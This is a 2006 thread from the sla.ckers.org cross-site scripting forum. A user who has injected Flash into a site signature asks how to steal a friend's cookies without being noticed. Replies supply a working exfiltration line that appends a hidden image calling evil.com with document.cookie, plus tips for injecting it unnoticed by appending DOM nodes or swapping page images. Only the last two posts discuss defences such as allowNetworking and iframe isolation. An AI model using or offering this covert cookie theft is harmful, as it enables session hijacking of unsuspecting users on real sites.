Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS and flash
Posted by: kyo1
Date: September 17, 2006 05:10AM

well, i am at a site that allows you to embed flash in your signature, i managed to alert the cookies by using getURL, now i want to make a frame to transfer the cookies, but when i use document.write it overwrites the whole page, innerHTML is not working either, it cant find the tags on the page...
this needs to work with firefox, since thats the browser my friend is using, doesnt need to work with opera/IE

i could of course use document.write anyway, since it fetches the cookies perfectly fine, but i dont want my friend to notice what i am doing...

what should i do?

is there a way to fetch ALL the content of the site, so i can re-document.write it?

-kyo



Edited 2 time(s). Last edit at 09/17/2006 07:07AM by kyo1.

Options: ReplyQuote
Re: XSS and flash
Posted by: maluc
Date: September 17, 2006 05:23AM

when you say you aren't able to use innerHTML .. have you tried document.getElementById('anytagwithid=').innerHTML ?

assuming in the source of the page there's some tag like <div id="adspam">blah</div> .. you can append data (instead of overwriting) using
document.getElementById('adspam').innerHTML = document.getElementById('adspam').innerHTML + "<img src='http://evil.com/cookiestealer.jpg?" + document.cookie + "' style='visibility:hidden' />";

if the image still changes some of the spacing.. throw in height='0' width='0'

image tags are nicer to use, when possible, instead of iframes for those security minded folks that disable iframes.

-maluc

Options: ReplyQuote
Re: XSS and flash
Posted by: WhiteAcid
Date: September 17, 2006 05:26AM

btw, it can be abbreivted using document.getElementById('adspam').innerHTML += "new stuff".
If even just do
document.body.innerHTML += "new stuff"

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: XSS and flash
Posted by: kyo1
Date: September 17, 2006 06:40AM

yes i did try that, it does the same as document.write, when i do it with += i get the content of the div, my new code and nothing else than that...

Options: ReplyQuote
Re: XSS and flash
Posted by: maluc
Date: September 17, 2006 06:58AM

hrm, that is weird.. then use the document.body as whiteacid suggested..

if not.. windows.frames[0].innerHTML += .. should work as well

-maluc



Edited 1 time(s). Last edit at 09/17/2006 06:58AM by maluc.

Options: ReplyQuote
Re: XSS and flash
Posted by: kyo1
Date: September 17, 2006 07:06AM

those dont work with firefox either...

Options: ReplyQuote
Re: XSS and flash
Posted by: WhiteAcid
Date: September 17, 2006 09:34AM

I'd quite want to test these myself on the site.

Anyway.. innerHTML is out of the question.
I don't know if flash can do this, but what about the DOM approach ie:
txt = document.createElement('input')
txt.type = 'text'
txt.value = 'something'
document.body.appendChild(txt)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: XSS and flash
Posted by: rsnake
Date: September 17, 2006 01:24PM

Yup, that last suggestion WhiteAcid said is what I would have suggested as well. You really just want to append it to the end of the page. You can also just change an existing image to another image (your cookie stealer) by iterating through the images on the page. That doesn't mean you have to break the image either, you can still show the correct image (301 or output it with your cookie stealer script).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS and flash
Posted by: metal_hurlant
Date: September 29, 2006 01:29AM

For the other side of the coin (ie, the crazy people that still think allowing users to embed arbitrary flash content is a good idea (hi myspace):)

Setting allowScriptAccess="never" as a parameter on the <embed> tag was supposed to be enough to prevent embedded flash movies from executing script in the page context.
Unfortunately, it didn't quite work out that way, so the only methods available to prevent arbitrary script execution are:
1: disable flash embedding altogether. but that's no fun.
2: detect the flash player version and react in one of the following manners:
a. if version >= 9.0, add allowNetworking="internal" and allow movie to load. otherwise, prevent movie from loading. This approach will break any attempt to use GetURL, including legitimate "http://" uses.
b. if version > 8.0.24, or version >= 7.066, allow movie to load, otherwise, prevent movie from loading.

Options: ReplyQuote
Re: XSS and flash
Posted by: rsnake
Date: September 29, 2006 10:18AM

What about the concept of putting it in an iframe on another domain? That way the JavaScript is limited to what it can do in the other domain (no cookies, nothing dynamic). So all you risk is redirection/CSRF/Intranet port scanning (not like that's no risk, but it could mitigate it a little). Just a thought.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.